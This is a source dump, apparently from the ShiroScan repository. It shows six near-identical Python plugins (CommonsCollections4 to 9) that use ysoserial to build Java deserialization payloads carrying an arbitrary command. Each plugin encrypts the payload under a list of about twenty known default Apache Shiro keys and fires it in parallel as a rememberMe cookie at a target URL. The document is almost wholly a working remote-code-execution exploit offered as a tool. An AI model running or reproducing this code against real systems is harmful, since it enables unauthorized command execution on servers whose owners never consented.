requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="},verify=False, timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections4模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections4模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections5.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class6:CommonsCollections5') 19 | class CommonsCollections5(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections5', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="},verify=False, timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections5模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections5模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections6.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class7:CommonsCollections6') 19 | class CommonsCollections6(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections6', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="},verify=False, timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections6模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections6模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections7.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class8:CommonsCollections7') 19 | class CommonsCollections7(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections7', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="},verify=False, timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections7模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections7模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections8.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class9:CommonsCollections8') 19 | class CommonsCollections8(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections8', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="}, verify=False,timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections8模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections8模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/CommonsCollections9.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # By 斯文beast svenbeast.com 3 | 4 | import os 5 | import re 6 | import base64 7 | import uuid 8 | import subprocess 9 | import requests 10 | import sys 11 | import threadpool 12 | from Crypto.Cipher import AES 13 | from ..main import Idea 14 | requests.packages.urllib3.disable_warnings() 15 | 16 | JAR_FILE = 'moule/ysoserial.jar' 17 | 18 | @Idea.plugin_register('Class10:CommonsCollections9') 19 | class CommonsCollections9(object): 20 | def process(self,url,command, thre): 21 | self.poc(url,command, thre) 22 | 23 | def generator(self, String, fp=JAR_FILE): 24 | 25 | key_rule = re.compile('(.*?)1234url3456') 26 | url_rule = re.compile('1234url3456(.*?)1234command3456') 27 | command_rule = re.compile('1234command3456(.*?)1234sven3456') 28 | 29 | key = key_rule.findall(String)[0] 30 | target = url_rule.findall(String)[0] 31 | command = command_rule.findall(String)[0] 32 | 33 | if not os.path.exists(fp): 34 | raise Exception('jar file not found!') 35 | popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections9', command], #popen 36 | stdout=subprocess.PIPE) 37 | BS = AES.block_size 38 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 39 | mode = AES.MODE_CBC 40 | iv = uuid.uuid4().bytes 41 | encryptor = AES.new(base64.b64decode(key), mode, iv) #受key影响的encryptor 42 | file_body = pad(popen.stdout.read()) #受popen影响的file_body 43 | payload = base64.b64encode(iv + encryptor.encrypt(file_body)) 44 | header={ 45 | 'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;' 46 | } 47 | try: 48 | r = requests.get(target, headers=header, cookies={'rememberMe': payload.decode()+"="}, verify=False,timeout=20) # 发送验证请求1 49 | #print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode()) 50 | if(r.status_code==200): 51 | print("[+] CommonsCollections9模块 key: {} 已成功发送! 状态码:{}".format(str(key),str(r.status_code))) 52 | else: 53 | print("[-] CommonsCollections9模块 key: {} 发送异常!\n[-] 状态码:{}".format(str(key),str(r.status_code))) 54 | except Exception as e: 55 | print(e) 56 | return False 57 | 58 | def multithreading(self,funcname,url ,command, pools): 59 | 60 | key = ['kPH+bIxk5D2deZiIxcaaaA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456','2AvVhdsgUs0FSA3SDFAdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','4AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456', 61 | '3AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456','Z3VucwAAAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','U3ByaW5nQmxhZGUAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','wGiHplamyXlVB11UXWol8g==1234url3456'+url+'1234command3456'+command+'1234sven3456', 62 | '6ZmI6I2j5Y+R5aSn5ZOlAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','fCq+/xW488hMTCD+cmJ3aQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','1QWLxg+NYmxraMoxAXu/Iw==1234url3456'+url+'1234command3456'+command+'1234sven3456','ZUdsaGJuSmxibVI2ZHc9PQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 63 | 'L7RioUULEFhRyxM7a2R/Yg==1234url3456'+url+'1234command3456'+command+'1234sven3456','r0e3c16IdVkouZgk1TKVMg==1234url3456'+url+'1234command3456'+command+'1234sven3456','5aaC5qKm5oqA5pyvAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWluZS1hc3NldC1rZXk6QQ==1234url3456'+url+'1234command3456'+command+'1234sven3456', 64 | 'a2VlcE9uR29pbmdBbmRGaQ==1234url3456'+url+'1234command3456'+command+'1234sven3456','WcfHGU25gNnTxTlmJMeSpw==1234url3456'+url+'1234command3456'+command+'1234sven3456','bWljcm9zAAAAAAAAAAAAAA==1234url3456'+url+'1234command3456'+command+'1234sven3456','MTIzNDU2Nzg5MGFiY2RlZg==1234url3456'+url+'1234command3456'+command+'1234sven3456', 65 | '5AvVhmFLUs0KTA3Kprsdag==1234url3456'+url+'1234command3456'+command+'1234sven3456'] 66 | 67 | pool = threadpool.ThreadPool(pools) 68 | requests = threadpool.makeRequests(funcname,key) 69 | [pool.putRequest(req) for req in requests] 70 | pool.wait() 71 | def poc(self,url, command, thre): 72 | 73 | self.multithreading(self.generator, url, command, thre) 74 | return False 75 | 76 | 77 | -------------------------------------------------------------------------------- /moule/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | __all__ = ['CommonsBeanutils1','CommonsCollections1','CommonsCollections2','CommonsCollections3','CommonsCollections4','CommonsCollections5','CommonsCollections6','CommonsCollections7','CommonsCollections8','CommonsCollections9','CommonsCollections10'] -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsBeanutils1.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsBeanutils1.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections1.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections1.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections10.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections10.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections2.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections2.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections3.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections3.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections4.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections4.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections5.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections5.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections6.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections6.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections7.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ianxtianxt/ShiroScan/bb94d1055d90cec098b802789d2a334633036c5c/moule/plugins/__pycache__/CommonsCollections7.cpython-37.pyc -------------------------------------------------------------------------------- /moule/plugins/__pycache__/CommonsCollections8.cpython-37.pyc: -------------------------------------------------------------------------------- 